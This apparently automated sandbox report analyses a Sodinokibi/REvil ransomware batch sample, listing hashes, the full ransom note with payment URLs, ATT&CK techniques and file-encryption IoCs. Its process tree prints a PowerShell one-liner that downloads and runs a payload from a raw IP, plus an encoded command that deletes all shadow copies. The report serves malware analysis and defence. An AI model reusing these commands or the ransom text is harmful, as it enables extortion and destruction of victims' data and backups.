sodinokibi | c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673

General

Target

d0333bd53e654eef1380155f828b71d5.bat
Size

219B
MD5

72cc00975d3f7dc5564c1a0fdbd1897b
SHA1

7eac1c6c294cf6a12495a484965884263cd77ff2
SHA256

c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673
SHA512

9a76771f5f5e726113dca7e35c9ee71c4a2220e673c09b8fe48dd09385e1a2353d91a7002b198dbf136c03a435fa068657f6338a39f0095b148c8056cacf69e9

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5

Extracted

Path

C:\61k34-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 61k34. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B72C4F75A3359B40 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B72C4F75A3359B40 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: mFSHgG+RLQOIHSqPEUt6ZINlxKutFTyn/UiEzFwzramcxjtfObynXPtYx7tb5Jbu kCRZsc+++g+TSypmbP/pUXjGQhsIT0yEW0OecAWAgLjm+mpy6oTK7g/n3X8mXzm9 BGdEcsxIX18V8uP7ZMFixXh+ggmqjzGHOx720o1sJdvIRUE70RRe6x0FvyW1jpcm mGCrRItsF+rgUcbyWzYwNsLFfEHGg1LOy94Lp61fAUec0ux87Xi/0+Xx8VliEV2v mMIxQfmvc20QL7QoFltKmgNDDSGGaH99CuxZKtXVAC84CYXTwtq/xtKj7zWvnrDN 7wKia5l58EqEhxfub51c/Z7b9oL9ib0sYpWWXksF3bqfaznbNlq3fpvjYec4MC0q zyFYeR2GfdFe39lWf2othtRPTLNGCi3B7Odya+jyAqucW3n+daDPuGkI8TOnk8A7 fmkVbbHHE77auKv1e1hjuMOtEtQU3MDu35C4otXQwhXrwoW9Kubke3rpSlFYGxBu oKHpb8ulds3VK0X2TErg1TpDedBOp6YIbaQyXtHoCpDCm3tw8t96YRzMnh+X8z+C Gn9ji30bN67Z/++85eFSfL+d4r/nfQsbajogkU/bVngL3Uy00CWsifYQYwW1Bkhr j81pDlsefZUNJqWs4KmS0R5X5foM5skIAS4oooCl5Jh57BJdwRQ/g7mPXOeh+W9q i5NEFqg/feGMbtY1yY3JkJUe4PYOAxAd8wJpy5ATRKD2OFe9DyNTpO1KRs4L5wbJ XsySuZYN11vtUSm6cf6WtBp7BQe0iTJ4bKl92WACQg2oHU6eB6Dhh9XYLNUFAXbM 8MUQAizyM2zZFNiGH5nTtKkr5+jrH53Go57FF6Hjjbs/XaltwsRpTPnF+Gjb/qsy 1If5cbMDLoWCsHRwd3fLDRjJ9MQZ23l/2GBgX4K9vlhEOt/enjVH1WY0kBLaOEyo pZKkZsNxJTpZ5iJispRb6iQPXPf/wuJ266BAt9YwUSv1BG6oMThRBZwaYIFRwnX6 P8RqkYxARS+LQ9KmQq7SUlNgdSrBC7sahcy5atMl6s/MOGbdPw03oNQ1H1pXaeFr WV6G+EBvim8DaPDKcJhJd724/G6EeiVSTakNnwsd98Nu3KyoafHZSpD/KrTK+8is V4iZbPaXGNXrm0MmQJqT6Az4zQO9XN5cyhl/8pcjx5Ah5b3X61keXiEYFLgFPJE2 ZHU8HTHTILNuBNhjKys0Q5EAxHreIGylIsFqb7p0o1YLK5AEOHvYO+Nvb76sHtWy vnDI7uab+kDjJpYt20Q= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B72C4F75A3359B40

http://decryptor.cc/B72C4F75A3359B40

Signatures

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Drops file in Program Files directory 24 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\program files\61k34-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ClearBackup.3gp	powershell.exe
File opened for modification	\??\c:\program files\GrantSelect.svgz	powershell.exe
File opened for modification	\??\c:\program files\MountUninstall.wmv	powershell.exe
File opened for modification	\??\c:\program files\PingBackup.3gp	powershell.exe
File opened for modification	\??\c:\program files\WriteLimit.mp3	powershell.exe
File opened for modification	\??\c:\program files\AssertUnlock.rmi	powershell.exe
File opened for modification	\??\c:\program files\NewFormat.mp3	powershell.exe
File opened for modification	\??\c:\program files\ReadImport.scf	powershell.exe
File opened for modification	\??\c:\program files\ReadReset.vsx	powershell.exe
File opened for modification	\??\c:\program files\RenameHide.mpv2	powershell.exe
File opened for modification	\??\c:\program files\ResumeExit.vsx	powershell.exe
File opened for modification	\??\c:\program files\SwitchWatch.asp	powershell.exe
File opened for modification	\??\c:\program files\DismountUnregister.vbe	powershell.exe
File opened for modification	\??\c:\program files\ExpandOptimize.scf	powershell.exe
File opened for modification	\??\c:\program files\GetAdd.tiff	powershell.exe
File opened for modification	\??\c:\program files\MoveExpand.m4a	powershell.exe
File opened for modification	\??\c:\program files\ReceiveStop.mhtml	powershell.exe
File created	\??\c:\program files (x86)\61k34-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\OutSelect.tiff	powershell.exe
File opened for modification	\??\c:\program files\ProtectBackup.htm	powershell.exe
File opened for modification	\??\c:\program files\RemoveReceive.odp	powershell.exe
File opened for modification	\??\c:\program files\SplitProtect.ogg	powershell.exe
File opened for modification	\??\c:\program files\SuspendUse.svg	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sho4955txf08.bmp"	powershell.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 3820 wrote to memory of 3828	3820	cmd.exe	powershell.exe
PID 3820 wrote to memory of 3828	3820	cmd.exe	powershell.exe
PID 3820 wrote to memory of 3828	3820	cmd.exe	powershell.exe
PID 3828 wrote to memory of 3896	3828	powershell.exe	powershell.exe
PID 3828 wrote to memory of 3896	3828	powershell.exe	powershell.exe
PID 3828 wrote to memory of 3896	3828	powershell.exe	powershell.exe

Blacklisted process makes network request 81 IoCs

Processes:

powershell.exe

flow	pid	process
4	3828	powershell.exe
8	3828	powershell.exe
10	3828	powershell.exe
11	3828	powershell.exe
13	3828	powershell.exe
15	3828	powershell.exe
17	3828	powershell.exe
19	3828	powershell.exe
21	3828	powershell.exe
23	3828	powershell.exe
25	3828	powershell.exe
32	3828	powershell.exe
34	3828	powershell.exe
36	3828	powershell.exe
38	3828	powershell.exe
40	3828	powershell.exe
43	3828	powershell.exe
45	3828	powershell.exe
46	3828	powershell.exe
48	3828	powershell.exe
50	3828	powershell.exe
52	3828	powershell.exe
54	3828	powershell.exe
56	3828	powershell.exe
58	3828	powershell.exe
61	3828	powershell.exe
63	3828	powershell.exe
65	3828	powershell.exe
67	3828	powershell.exe
69	3828	powershell.exe
71	3828	powershell.exe
72	3828	powershell.exe
74	3828	powershell.exe
76	3828	powershell.exe
79	3828	powershell.exe
81	3828	powershell.exe
83	3828	powershell.exe
85	3828	powershell.exe
87	3828	powershell.exe
89	3828	powershell.exe
91	3828	powershell.exe
93	3828	powershell.exe
95	3828	powershell.exe
97	3828	powershell.exe
99	3828	powershell.exe
100	3828	powershell.exe
102	3828	powershell.exe
104	3828	powershell.exe
105	3828	powershell.exe
107	3828	powershell.exe
108	3828	powershell.exe
109	3828	powershell.exe
111	3828	powershell.exe
113	3828	powershell.exe
115	3828	powershell.exe
119	3828	powershell.exe
121	3828	powershell.exe
123	3828	powershell.exe
125	3828	powershell.exe
126	3828	powershell.exe
127	3828	powershell.exe
128	3828	powershell.exe
131	3828	powershell.exe
133	3828	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeBackupPrivilege	3060	vssvc.exe
Token: SeRestorePrivilege	3060	vssvc.exe
Token: SeAuditPrivilege	3060	vssvc.exe
Token: SeTakeOwnershipPrivilege	3828	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
3896	powershell.exe
3896	powershell.exe
3896	powershell.exe

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\MoveCheckpoint.tif => \??\c:\users\admin\pictures\MoveCheckpoint.tif.61k34	powershell.exe
File renamed	C:\Users\Admin\Pictures\RepairApprove.crw => \??\c:\users\admin\pictures\RepairApprove.crw.61k34	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\BackupShow.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\BackupShow.tiff => \??\c:\users\admin\pictures\BackupShow.tiff.61k34	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConnectBlock.png => \??\c:\users\admin\pictures\ConnectBlock.png.61k34	powershell.exe
File renamed	C:\Users\Admin\Pictures\InvokeRedo.crw => \??\c:\users\admin\pictures\InvokeRedo.crw.61k34	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d0333bd53e654eef1380155f828b71d5.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5');Invoke-RCYSVVOUOPIT;Start-Sleep -s 10000"
2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Modifies extensions of user files
PID:3828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3896

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3060

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3828-0-0x0000000000000000-mapping.dmp

Download
memory/3828-1-0x0000000073490000-0x0000000073B7E000-memory.dmp

Filesize
6.9MB

Download
memory/3828-2-0x0000000004BA0000-0x0000000004BA1000-memory.dmp

Filesize
4KB

Download
memory/3828-3-0x00000000076E0000-0x00000000076E1000-memory.dmp

Filesize
4KB

Download
memory/3828-4-0x0000000007530000-0x0000000007531000-memory.dmp

Filesize
4KB

Download
memory/3828-5-0x0000000007D10000-0x0000000007D11000-memory.dmp

Filesize
4KB

Download
memory/3828-6-0x0000000007D80000-0x0000000007D81000-memory.dmp

Filesize
4KB

Download
memory/3828-7-0x0000000007FD0000-0x0000000007FD1000-memory.dmp

Filesize
4KB

Download
memory/3828-8-0x0000000007E50000-0x0000000007E51000-memory.dmp

Filesize
4KB

Download
memory/3828-9-0x0000000008820000-0x0000000008821000-memory.dmp

Filesize
4KB

Download
memory/3828-10-0x00000000086A0000-0x00000000086A1000-memory.dmp

Filesize
4KB

Download
memory/3828-11-0x0000000009E40000-0x0000000009E41000-memory.dmp

Filesize
4KB

Download
memory/3828-12-0x00000000093C0000-0x00000000093C1000-memory.dmp

Filesize
4KB

Download
memory/3896-13-0x0000000000000000-mapping.dmp

Download
memory/3896-14-0x0000000073490000-0x0000000073B7E000-memory.dmp

Filesize
6.9MB

Download
memory/3896-24-0x0000000008BF0000-0x0000000008BF1000-memory.dmp

Filesize
4KB

Download
memory/3896-26-0x00000000089B0000-0x00000000089B1000-memory.dmp

Filesize
4KB

Download
memory/3896-27-0x0000000009250000-0x0000000009251000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads